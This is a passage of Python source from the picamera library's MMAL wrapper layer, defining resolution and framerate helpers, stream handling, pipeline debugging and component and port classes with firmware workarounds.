mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE: mmal.MMAL_PARAMETER_VIDEO_INTERLACE_TYPE_T,
mmal.MMAL_PARAMETER_VIDEO_INTERPOLATE_TIMESTAMPS: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH: mmal.MMAL_PARAMETER_VIDEO_INTRA_REFRESH_T,
mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION: mmal.MMAL_PARAMETER_VIDEO_LEVEL_EXTENSION_T,
mmal.MMAL_PARAMETER_VIDEO_MAX_NUM_CALLBACKS: mmal.MMAL_PARAMETER_UINT32_T,
mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS: mmal.MMAL_PARAMETER_VIDEO_RENDER_STATS_T,
mmal.MMAL_PARAMETER_VIDEO_REQUEST_I_FRAME: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_VIDEO_STABILISATION: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_COPY: mmal.MMAL_PARAMETER_BOOLEAN_T,
mmal.MMAL_PARAMETER_ZERO_SHUTTER_LAG: mmal.MMAL_PARAMETER_ZEROSHUTTERLAG_T,
mmal.MMAL_PARAMETER_ZOOM: mmal.MMAL_PARAMETER_SCALEFACTOR_T,
}
class PiCameraFraction(Fraction):
"""
Extends :class:`~fractions.Fraction` to act as a (numerator, denominator)
tuple when required.
"""
def __len__(self):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
return 2
def __getitem__(self, index):
warnings.warn(
PiCameraDeprecated(
'Accessing framerate as a tuple is deprecated; this value is '
'now a Fraction, so you can query the numerator and '
'denominator properties directly, convert to an int or float, '
'or perform arithmetic operations and comparisons directly'))
if index == 0:
return self.numerator
elif index == 1:
return self.denominator
else:
raise IndexError('invalid index %d' % index)
def __contains__(self, value):
return value in (self.numerator, self.denominator)
class PiResolution(namedtuple('PiResolution', ('width', 'height'))):
"""
A :func:`~collections.namedtuple` derivative which represents a resolution
with a :attr:`width` and :attr:`height`.
.. attribute:: width
The width of the resolution in pixels
.. attribute:: height
The height of the resolution in pixels
.. versionadded:: 1.11
"""
__slots__ = () # workaround python issue #24931
def pad(self, width=32, height=16):
"""
Returns the resolution padded up to the nearest multiple of *width*
and *height* which default to 32 and 16 respectively (the camera's
native block size for most operations). For example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).pad()
PiResolution(width=1920, height=1088)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=128, height=112)
>>> PiResolution(100, 100).pad(16, 16)
PiResolution(width=112, height=112)
"""
return PiResolution(
width=((self.width + (width - 1)) // width) * width,
height=((self.height + (height - 1)) // height) * height,
)
def transpose(self):
"""
Returns the resolution with the width and height transposed. For
example:
.. code-block:: pycon
>>> PiResolution(1920, 1080).transpose()
PiResolution(width=1080, height=1920)
"""
return PiResolution(self.height, self.width)
def __str__(self):
return '%dx%d' % (self.width, self.height)
class PiFramerateRange(namedtuple('PiFramerateRange', ('low', 'high'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the low and high limits of a range of framerates. It is recommended that
you access the information stored by this class by attribute rather than
position (for example: ``camera.framerate_range.low`` rather than
``camera.framerate_range[0]``).
.. attribute:: low
The lowest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. attribute:: high
The highest framerate that the camera is permitted to use (inclusive).
When the :attr:`~picamera.PiCamera.framerate_range` attribute is
queried, this value will always be returned as a
:class:`~fractions.Fraction`.
.. versionadded:: 1.13
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, low, high):
return super(PiFramerateRange, cls).__new__(cls, to_fraction(low),
to_fraction(high))
def __str__(self):
return '%s..%s' % (self.low, self.high)
class PiSensorMode(namedtuple('PiSensorMode', ('resolution', 'framerates',
'video', 'still', 'full_fov'))):
"""
This class is a :func:`~collections.namedtuple` derivative used to store
the attributes describing a camera sensor mode.
.. attribute:: resolution
A :class:`PiResolution` specifying the size of frames output by the
camera in this mode.
.. attribute:: framerates
A :class:`PiFramerateRange` specifying the minimum and maximum
framerates supported by this sensor mode. Typically the low value is
exclusive and high value inclusive.
.. attribute:: video
A :class:`bool` indicating whether or not the mode is capable of
recording video. Currently this is always ``True``.
.. attribute:: still
A :class:`bool` indicating whether the mode can be used for still
captures (cases where a capture method is called with
``use_video_port`` set to ``False``).
.. attribute:: full_fov
A :class:`bool` indicating whether the full width of the sensor
area is used to capture frames. This can be ``True`` even when the
resolution is less than the camera's maximum resolution due to binning
and skipping. See :ref:`camera_modes` for a diagram of the available
fields of view.
"""
__slots__ = () # workaround python issue #24931
def __new__(cls, resolution, framerates, video=True, still=False,
full_fov=True):
return super(PiSensorMode, cls).__new__(
cls,
resolution
if isinstance(resolution, PiResolution) else
to_resolution(resolution),
framerates
if isinstance(framerates, PiFramerateRange) else
PiFramerateRange(*framerates),
video, still, full_fov)
def open_stream(stream, output=True, buffering=65536):
"""
This is the core of picamera's IO-semantics. It returns a tuple of a
file-like object and a bool indicating whether the stream requires closing
once the caller is finished with it.
* If *stream* is a string, it is opened as a file object (with mode 'wb' if
*output* is ``True``, and the specified amount of *bufffering*). In this
case the function returns ``(stream, True)``.
* If *stream* is a stream with a ``write`` method, it is returned as
``(stream, False)``.
* Otherwise *stream* is assumed to be a writeable buffer and is wrapped
with :class:`BufferIO`. The function returns ``(stream, True)``.
"""
if isinstance(stream, bytes):
stream = stream.decode('ascii')
opened = isinstance(stream, str)
if opened:
stream = io.open(stream, 'wb' if output else 'rb', buffering)
else:
try:
if output:
stream.write
else:
stream.read
except AttributeError:
# Assume the stream is actually a buffer
opened = True
stream = BufferIO(stream)
if output and not stream.writable:
raise IOError('writeable buffer required for output')
return (stream, opened)
def close_stream(stream, opened):
"""
If *opened* is ``True``, then the ``close`` method of *stream* will be
called. Otherwise, the function will attempt to call the ``flush`` method
on *stream* (if one exists). This function essentially takes the output
of :func:`open_stream` and finalizes the result.
"""
if opened:
stream.close()
else:
try:
stream.flush()
except AttributeError:
pass
def to_resolution(value):
"""
Converts *value* which may be a (width, height) tuple or a string
containing a representation of a resolution (e.g. "1024x768" or "1080p") to
a (width, height) tuple.
"""
if isinstance(value, bytes):
value = value.decode('utf-8')
if isinstance(value, str):
try:
# A selection from https://en.wikipedia.org/wiki/Graphics_display_resolution
# Feel free to suggest additions
w, h = {
'VGA': (640, 480),
'SVGA': (800, 600),
'XGA': (1024, 768),
'SXGA': (1280, 1024),
'UXGA': (1600, 1200),
'HD': (1280, 720),
'FHD': (1920, 1080),
'1080P': (1920, 1080),
'720P': (1280, 720),
}[value.strip().upper()]
except KeyError:
w, h = (int(i.strip()) for i in value.upper().split('X', 1))
else:
try:
w, h = value
except (TypeError, ValueError):
raise PiCameraValueError("Invalid resolution tuple: %r" % value)
return PiResolution(w, h)
def to_fraction(value, den_limit=65536):
"""
Converts *value*, which can be any numeric type, an MMAL_RATIONAL_T, or a
(numerator, denominator) tuple to a :class:`~fractions.Fraction` limiting
the denominator to the range 0 < n <= *den_limit* (which defaults to
65536).
"""
try:
# int, long, or fraction
n, d = value.numerator, value.denominator
except AttributeError:
try:
# float
n, d = value.as_integer_ratio()
except AttributeError:
try:
n, d = value.num, value.den
except AttributeError:
try:
# tuple
n, d = value
warnings.warn(
PiCameraDeprecated(
"Setting framerate or gains as a tuple is "
"deprecated; please use one of Python's many "
"numeric classes like int, float, Decimal, or "
"Fraction instead"))
except (TypeError, ValueError):
# try and convert anything else to a Fraction directly
value = Fraction(value)
n, d = value.numerator, value.denominator
# Ensure denominator is reasonable
if d == 0:
raise PiCameraValueError("Denominator cannot be 0")
elif d > den_limit:
return Fraction(n, d).limit_denominator(den_limit)
else:
return Fraction(n, d)
def to_rational(value):
"""
Converts *value* (which can be anything accepted by :func:`to_fraction`) to
an MMAL_RATIONAL_T structure.
"""
value = to_fraction(value)
return mmal.MMAL_RATIONAL_T(value.numerator, value.denominator)
def buffer_bytes(buf):
"""
Given an object which implements the :ref:`buffer protocol
<bufferobjects>`, this function returns the size of the object in bytes.
The object can be multi-dimensional or include items larger than byte-size.
"""
if not isinstance(buf, memoryview):
buf = memoryview(buf)
return buf.itemsize * reduce(mul, buf.shape)
def debug_pipeline(port):
"""
Given an :class:`MMALVideoPort` *port*, this traces all objects in the
pipeline feeding it (including components and connections) and yields each
object in turn. Hence the generator typically yields something like:
* :class:`MMALVideoPort` (the specified output port)
* :class:`MMALEncoder` (the encoder which owns the output port)
* :class:`MMALVideoPort` (the encoder's input port)
* :class:`MMALConnection` (the connection between the splitter and encoder)
* :class:`MMALVideoPort` (the splitter's output port)
* :class:`MMALSplitter` (the splitter on the camera's video port)
* :class:`MMALVideoPort` (the splitter's input port)
* :class:`MMALConnection` (the connection between the splitter and camera)
* :class:`MMALVideoPort` (the camera's video port)
* :class:`MMALCamera` (the camera component)
"""
def find_port(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALControlPort):
if ct.addressof(obj._port[0]) == addr:
return obj
raise IndexError('unable to locate port with address %x' % addr)
def find_component(addr):
for obj in MMALObject.REGISTRY:
if isinstance(obj, MMALBaseComponent) and obj._component is not None:
if ct.addressof(obj._component[0]) == addr:
return obj
raise IndexError('unable to locate component with address %x' % addr)
assert isinstance(port, (MMALControlPort, MMALPythonPort))
while True:
if port.type == mmal.MMAL_PORT_TYPE_OUTPUT:
yield port
if isinstance(port, MMALPythonPort):
comp = port._owner()
else:
comp = find_component(ct.addressof(port._port[0].component[0]))
yield comp
if not isinstance(comp, (MMALComponent, MMALPythonComponent)):
break
if comp.connection is None:
break
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._target
else:
port = find_port(ct.addressof(comp.connection._connection[0].in_[0]))
yield port
yield comp.connection
if isinstance(comp.connection, MMALPythonConnection):
port = comp.connection._source
else:
port = find_port(ct.addressof(comp.connection._connection[0].out[0]))
def print_pipeline(port):
"""
Prints a human readable representation of the pipeline feeding the
specified :class:`MMALVideoPort` *port*.
"""
rows = [[], [], [], [], [], []]
under_comp = False
for obj in reversed(list(debug_pipeline(port))):
if isinstance(obj, (MMALBaseComponent, MMALPythonBaseComponent)):
rows[0].append(obj.name)
under_comp = True
elif isinstance(obj, MMALVideoPort):
rows[0].append('[%d]' % obj._port[0].index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._port[0].format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj._port[0].buffer_num, obj._port[0].buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._port[0].format[0].bitrate,))
if under_comp:
rows[4].append('frame')
rows[4].append('%dx%d@%sfps' % (
obj._port[0].format[0].es[0].video.width,
obj._port[0].format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
under_comp = False
rows[5].append(mmal.FOURCC_str(obj._port[0].format[0].es[0].video.color_space))
elif isinstance(obj, MMALPythonPort):
rows[0].append('[%d]' % obj._index)
if under_comp:
rows[1].append('encoding')
if obj.format == mmal.MMAL_ENCODING_OPAQUE:
rows[1].append(obj.opaque_subformat)
else:
rows[1].append(mmal.FOURCC_str(obj._format[0].encoding))
if under_comp:
rows[2].append('buf')
rows[2].append('%dx%d' % (obj.buffer_count, obj.buffer_size))
if under_comp:
rows[3].append('bitrate')
rows[3].append('%dbps' % (obj._format[0].bitrate,))
if under_comp:
rows[4].append('frame')
under_comp = False
rows[4].append('%dx%d@%sfps' % (
obj._format[0].es[0].video.width,
obj._format[0].es[0].video.height,
obj.framerate))
if under_comp:
rows[5].append('colorspc')
rows[5].append('???')
elif isinstance(obj, (MMALConnection, MMALPythonConnection)):
rows[0].append('')
rows[1].append('')
rows[2].append('-->')
rows[3].append('')
rows[4].append('')
rows[5].append('')
if under_comp:
rows[1].append('encoding')
rows[2].append('buf')
rows[3].append('bitrate')
rows[4].append('frame')
rows[5].append('colorspc')
cols = list(zip(*rows))
max_lens = [max(len(s) for s in col) + 2 for col in cols]
rows = [
''.join('{0:{align}{width}s}'.format(s, align=align, width=max_len)
for s, max_len, align in zip(row, max_lens, cycle('^<^>')))
for row in rows
]
for row in rows:
print(row)
class MMALObject(object):
"""
Represents an object wrapper around an MMAL object (component, port,
connection, etc). This base class maintains a registry of all MMAL objects
currently alive (via weakrefs) which permits object lookup by name and
listing all used MMAL objects.
"""
__slots__ = ('__weakref__',)
REGISTRY = weakref.WeakSet()
def __init__(self):
super(MMALObject, self).__init__()
MMALObject.REGISTRY.add(self)
class MMALBaseComponent(MMALObject):
"""
Represents a generic MMAL component. Class attributes are read to determine
the component type, and the OPAQUE sub-formats of each connectable port.
"""
__slots__ = ('_component', '_control', '_inputs', '_outputs')
component_type = b'none'
opaque_input_subformats = ()
opaque_output_subformats = ()
def __init__(self):
super(MMALBaseComponent, self).__init__()
self._component = ct.POINTER(mmal.MMAL_COMPONENT_T)()
mmal_check(
mmal.mmal_component_create(self.component_type, self._component),
prefix="Failed to create MMAL component %s" % self.component_type)
if self._component[0].input_num != len(self.opaque_input_subformats):
raise PiCameraRuntimeError(
'Expected %d inputs but found %d on component %s' % (
len(self.opaque_input_subformats),
self._component[0].input_num,
self.component_type))
if self._component[0].output_num != len(self.opaque_output_subformats):
raise PiCameraRuntimeError(
'Expected %d outputs but found %d on component %s' % (
len(self.opaque_output_subformats),
self._component[0].output_num,
self.component_type))
self._control = MMALControlPort(self._component[0].control)
port_class = {
mmal.MMAL_ES_TYPE_UNKNOWN: MMALPort,
mmal.MMAL_ES_TYPE_CONTROL: MMALControlPort,
mmal.MMAL_ES_TYPE_VIDEO: MMALVideoPort,
mmal.MMAL_ES_TYPE_AUDIO: MMALAudioPort,
mmal.MMAL_ES_TYPE_SUBPICTURE: MMALSubPicturePort,
}
self._inputs = tuple(
port_class[self._component[0].input[n][0].format[0].type](
self._component[0].input[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_input_subformats))
self._outputs = tuple(
port_class[self._component[0].output[n][0].format[0].type](
self._component[0].output[n], opaque_subformat)
for n, opaque_subformat in enumerate(self.opaque_output_subformats))
def close(self):
"""
Close the component and release all its resources. After this is
called, most methods will raise exceptions if called.
"""
if self._component is not None:
# ensure we free any pools associated with input/output ports
for output in self.outputs:
output.disable()
for input in self.inputs:
input.disable()
mmal.mmal_component_destroy(self._component)
self._component = None
self._inputs = ()
self._outputs = ()
self._control = None
@property
def name(self):
return self._component[0].name.decode('ascii')
@property
def control(self):
"""
The :class:`MMALControlPort` control port of the component which can be
used to configure most aspects of the component's behaviour.
"""
return self._control
@property
def inputs(self):
"""
A sequence of :class:`MMALPort` objects representing the inputs
of the component.
"""
return self._inputs
@property
def outputs(self):
"""
A sequence of :class:`MMALPort` objects representing the outputs
of the component.
"""
return self._outputs
@property
def enabled(self):
"""
Returns ``True`` if the component is currently enabled. Use
:meth:`enable` and :meth:`disable` to control the component's state.
"""
return bool(self._component[0].is_enabled)
def enable(self):
"""
Enable the component. When a component is enabled it will process data
sent to its input port(s), sending the results to buffers on its output
port(s). Components may be implicitly enabled by connections.
"""
mmal_check(
mmal.mmal_component_enable(self._component),
prefix="Failed to enable component")
def disable(self):
"""
Disables the component.
"""
mmal_check(
mmal.mmal_component_disable(self._component),
prefix="Failed to disable component")
def __enter__(self):
return self
def __exit__(self, exc_type, exc_value, exc_tb):
self.close()
def __repr__(self):
if self._component is not None:
return '<%s "%s": %d inputs %d outputs>' % (
self.__class__.__name__, self.name,
len(self.inputs), len(self.outputs))
else:
return '<%s closed>' % self.__class__.__name__
class MMALControlPort(MMALObject):
"""
Represents an MMAL port with properties to configure the port's parameters.
"""
__slots__ = ('_port', '_params', '_wrapper')
def __init__(self, port):
super(MMALControlPort, self).__init__()
self._port = port
self._params = MMALPortParams(port)
self._wrapper = None
@property
def index(self):
"""
Returns an integer indicating the port's position within its owning
list (inputs, outputs, etc.)
"""
return self._port[0].index
@property
def enabled(self):
"""
Returns a :class:`bool` indicating whether the port is currently
enabled. Unlike other classes, this is a read-only property. Use
:meth:`enable` and :meth:`disable` to modify the value.
"""
return bool(self._port[0].is_enabled)
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. Any return value will be ignored.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
callback(self, buf)
finally:
buf.release()
if callback:
self._wrapper = mmal.MMAL_PORT_BH_CB_T(wrapper)
else:
self._wrapper = ct.cast(None, mmal.MMAL_PORT_BH_CB_T)
mmal_check(
mmal.mmal_port_enable(self._port, self._wrapper),
prefix="Unable to enable port %s" % self.name)
def disable(self):
"""
Disable the port.
"""
# NOTE: The test here only exists to avoid spamming the console; when
# disabling an already disabled port MMAL dumps errors to stderr. If
# this test isn't here closing a camera results in half a dozen lines
# of ignored errors
if self.enabled:
try:
mmal_check(
mmal.mmal_port_disable(self._port),
prefix="Unable to disable port %s" % self.name)
except PiCameraMMALError as e:
# Ignore the error if we're disabling an already disabled port
if not (e.status == mmal.MMAL_EINVAL and not self.enabled):
raise e
self._wrapper = None
@property
def name(self):
result = self._port[0].name.decode('ascii')
if result.endswith(')'):
try:
# strip (format) from port names as it doesn't really belong
# there (it doesn't identify the port in any way) and makes
# matching some of the correctional cases a pain
return result[:result.rindex('(')]
except ValueError:
return result
else:
return result
@property
def type(self):
"""
The type of the port. One of:
* MMAL_PORT_TYPE_OUTPUT
* MMAL_PORT_TYPE_INPUT
* MMAL_PORT_TYPE_CONTROL
* MMAL_PORT_TYPE_CLOCK
"""
return self._port[0].type
@property
def capabilities(self):
"""
The capabilities of the port. A bitfield of the following:
* MMAL_PORT_CAPABILITY_PASSTHROUGH
* MMAL_PORT_CAPABILITY_ALLOCATION
* MMAL_PORT_CAPABILITY_SUPPORTS_EVENT_FORMAT_CHANGE
"""
return self._port[0].capabilities
@property
def params(self):
"""
The configurable parameters for the port. This is presented as a
mutable mapping of parameter numbers to values, implemented by the
:class:`MMALPortParams` class.
"""
return self._params
def __repr__(self):
if self._port is not None:
return '<MMALControlPort "%s">' % self.name
else:
return '<MMALControlPort closed>'
class MMALPort(MMALControlPort):
"""
Represents an MMAL port with properties to configure and update the port's
format. This is the base class of :class:`MMALVideoPort`,
:class:`MMALAudioPort`, and :class:`MMALSubPicturePort`.
"""
__slots__ = ('_opaque_subformat', '_pool', '_stopped', '_connection')
# A mapping of corrected definitions of supported_formats for ports with
# particular names. Older firmwares either raised EINVAL, ENOSYS, or just
# reported the wrong things for various ports; these lists are derived from
# querying newer firmwares or in some cases guessing sensible defaults
# (for ports where even the newer firmwares get stuff wrong).
_supported_formats_patch = {
'vc.ril.camera:out:2': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_NV21,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
],
'vc.ril.image_encode:in:0': [
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
],
'vc.ril.image_encode:out:0': [
mmal.MMAL_ENCODING_JPEG,
mmal.MMAL_ENCODING_GIF,
mmal.MMAL_ENCODING_PNG,
mmal.MMAL_ENCODING_BMP,
mmal.MMAL_ENCODING_PPM,
mmal.MMAL_ENCODING_TGA,
],
'vc.ril.resize:in:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# several invalid encodings (lowercase versions of the priors)
# appear here in modern firmwares but since they don't map to any
# constants they're excluded
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.resize:out:0': [
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_I420,
# same invalid encodings as above here
mmal.MMAL_ENCODING_I420_SLICE,
],
'vc.ril.isp:in:0': [
mmal.MMAL_ENCODING_BAYER_SBGGR8,
mmal.MMAL_ENCODING_BAYER_SBGGR10DPCM8,
mmal.MMAL_ENCODING_BAYER_SBGGR10P,
mmal.MMAL_ENCODING_BAYER_SBGGR12P,
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.ril.isp:out:0': [
mmal.MMAL_ENCODING_YUYV,
mmal.MMAL_ENCODING_YVYU,
mmal.MMAL_ENCODING_VYUY,
mmal.MMAL_ENCODING_UYVY,
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_YV12,
mmal.MMAL_ENCODING_I422,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
mmal.MMAL_ENCODING_RGB16,
mmal.MMAL_ENCODING_YUVUV128,
mmal.MMAL_ENCODING_NV12,
mmal.MMAL_ENCODING_NV21,
],
'vc.null_sink:in:0': [
mmal.MMAL_ENCODING_I420,
mmal.MMAL_ENCODING_RGB24,
mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_RGBA,
mmal.MMAL_ENCODING_BGRA,
],
}
def __init__(self, port, opaque_subformat='OPQV'):
super(MMALPort, self).__init__(port)
self.opaque_subformat = opaque_subformat
self._pool = None
self._stopped = True
self._connection = None
def __repr__(self):
if self._port is not None:
return '<MMALPort "%s": format=MMAL_FOURCC(%r) buffers=%dx%d>' % (
self.name, mmal.FOURCC_str(self.format),
self.buffer_count, self.buffer_size)
else:
return '<MMALPort closed>'
def _get_opaque_subformat(self):
return self._opaque_subformat
def _set_opaque_subformat(self, value):
self._opaque_subformat = value
opaque_subformat = property(
_get_opaque_subformat, _set_opaque_subformat, doc="""\
Retrieves or sets the opaque sub-format that the port speaks. While
most formats (I420, RGBA, etc.) mean one thing, the opaque format is
special; different ports produce different sorts of data when
configured for OPQV format. This property stores a string which
uniquely identifies what the associated port means for OPQV format.
If the port does not support opaque format at all, set this property to
``None``.
:class:`MMALConnection` uses this information when negotiating formats
for a connection between two ports.
""")
def _get_format(self):
result = self._port[0].format[0].encoding
if FIX_RGB_BGR_ORDER:
return {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(result, result)
else:
return result
def _set_format(self, value):
if FIX_RGB_BGR_ORDER:
value = {
mmal.MMAL_ENCODING_RGB24: mmal.MMAL_ENCODING_BGR24,
mmal.MMAL_ENCODING_BGR24: mmal.MMAL_ENCODING_RGB24,
}.get(value, value)
self._port[0].format[0].encoding = value
if value == mmal.MMAL_ENCODING_OPAQUE:
self._port[0].format[0].encoding_variant = mmal.MMAL_ENCODING_I420
format = property(_get_format, _set_format, doc="""\
Retrieves or sets the encoding format of the port. Setting this
attribute implicitly sets the encoding variant to a sensible value
(I420 in the case of OPAQUE).
After setting this attribute, call :meth:`commit` to make the changes
effective.
""")
@property
def supported_formats(self):
"""
Retrieves a sequence of supported encodings on this port.
"""
try:
mp = self.params[mmal.MMAL_PARAMETER_SUPPORTED_ENCODINGS]
except PiCameraMMALError as e:
if e.status in (mmal.MMAL_EINVAL, mmal.MMAL_ENOSYS):
# Workaround: old firmwares raise EINVAL or ENOSYS when various
# ports are queried for supported formats. The following is the
# correct sequence for old firmwares (note: swapped RGB24 and
# BGR24 order in still port) ... probably (vc.ril.camera:out:2
# is definitely right, the rest are largely guessed based on
# queries of later firmwares)
try:
return MMALPort._supported_formats_patch[self.name]
except KeyError:
raise e
else:
raise
else:
result = [
v for v in mp.encoding if v != 0
][:mp.hdr.size // ct.sizeof(ct.c_uint32)]
# Workaround: Fix incorrect result on MMALImageEncoder.outputs[0]
# from modern firmwares
if self.name == 'vc.ril.image_encode:out:0' and result == [
mmal.MMAL_ENCODING_MP2V, mmal.MMAL_ENCODING_MP2V,
mmal.MMAL_ENCODING_H264, mmal.MMAL_ENCODING_H264,
mmal.MMAL_ENCODING_VP7, mmal.MMAL_ENCODING_VP7,
mmal.MMAL_ENCODING_VP6, mmal.MMAL_ENCODING_VP6]:
return MMALPort._supported_formats_patch[self.name]
else:
return result
def _get_bitrate(self):
return self._port[0].format[0].bitrate
def _set_bitrate(self, value):
self._port[0].format[0].bitrate = value
bitrate = property(_get_bitrate, _set_bitrate, doc="""\
Retrieves or sets the bitrate limit for the port's format.
""")
def copy_from(self, source):
"""
Copies the port's :attr:`format` from the *source*
:class:`MMALControlPort`.
"""
if isinstance(source, MMALPythonPort):
mmal.mmal_format_copy(self._port[0].format, source._format)
else:
mmal.mmal_format_copy(self._port[0].format, source._port[0].format)
def commit(self):
"""
Commits the port's configuration and automatically updates the number
and size of associated buffers according to the recommendations of the
MMAL library. This is typically called after adjusting the port's
format and/or associated settings (like width and height for video
ports).
"""
mmal_check(
mmal.mmal_port_format_commit(self._port),
prefix="Format couldn't be set on port %s" % self.name)
# Workaround: Unfortunately, there is an upstream issue with the
# buffer_num_recommended which means it can't currently be used (see
# discussion in raspberrypi/userland#167). There's another upstream
# issue with buffer_num_min which means we need to guard against 0
# values...
self._port[0].buffer_num = max(1, self._port[0].buffer_num_min)
self._port[0].buffer_size = (
self._port[0].buffer_size_recommended
if self._port[0].buffer_size_recommended > 0 else
self._port[0].buffer_size_min)
@property
def pool(self):
"""
Returns the :class:`MMALPool` associated with the buffer, if any.
"""
return self._pool
def get_buffer(self, block=True, timeout=None):
"""
Returns a :class:`MMALBuffer` from the associated :attr:`pool`. *block*
and *timeout* act as they do in the corresponding
:meth:`MMALPool.get_buffer`.
"""
if not self.enabled:
raise PiCameraPortDisabled(
'cannot get buffer from disabled port %s' % self.name)
return self.pool.get_buffer(block, timeout)
def send_buffer(self, buf):
"""
Send :class:`MMALBuffer` *buf* to the port.
"""
if (
self.type == mmal.MMAL_PORT_TYPE_INPUT and
isinstance(self._connection, MMALPythonConnection) and
self._connection._callback is not None):
try:
modified_buf = self._connection._callback(self._connection, buf)
except:
buf.release()
raise
else:
if modified_buf is None:
buf.release()
return
else:
buf = modified_buf
try:
mmal_check(
mmal.mmal_port_send_buffer(self._port, buf._buf),
prefix="cannot send buffer to port %s" % self.name)
except PiCameraMMALError as e:
# If port is disabled, convert exception for convenience
if e.status == mmal.MMAL_EINVAL and not self.enabled:
raise PiCameraPortDisabled(
'cannot send buffer to disabled port %s' % self.name)
else:
raise
def flush(self):
"""
Flush the port.
"""
mmal_check(
mmal.mmal_port_flush(self._port),
prefix="Unable to flush port %s" % self.name)
def _get_buffer_count(self):
return self._port[0].buffer_num
def _set_buffer_count(self, value):
if value < 1:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer count <1')
self._port[0].buffer_num = value
buffer_count = property(_get_buffer_count, _set_buffer_count, doc="""\
The number of buffers allocated (or to be allocated) to the port.
The ``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def _get_buffer_size(self):
return self._port[0].buffer_size
def _set_buffer_size(self, value):
if value < 0:
raise PiCameraMMALError(mmal.MMAL_EINVAL, 'buffer size <0')
self._port[0].buffer_size = value
buffer_size = property(_get_buffer_size, _set_buffer_size, doc="""\
The size of buffers allocated (or to be allocated) to the port. The
size of buffers is typically dictated by the port's format. The
``mmalobj`` layer automatically configures this based on
recommendations from the MMAL library.
""")
def enable(self, callback=None):
"""
Enable the port with the specified callback function (this must be
``None`` for connected ports, and a callable for disconnected ports).
The callback function must accept two parameters which will be this
:class:`MMALControlPort` (or descendent) and an :class:`MMALBuffer`
instance. The callback should return ``True`` when processing is
complete and no further calls are expected (e.g. at frame-end for an
image encoder), and ``False`` otherwise.
"""
def wrapper(port, buf):
buf = MMALBuffer(buf)
try:
if not self._stopped and callback(self, buf):
self._stopped = True
finally:
buf.release()
try:
self._pool.send_buffer(block=False)
except PiCameraPortDisabled:
# The port was disabled, no point trying again
pass
# Workaround: There is a bug in the MJPEG encoder that causes a
# deadlock if the FIFO is full on shutdown. Increasing the encoder
# buffer size makes this less likely to happen. See
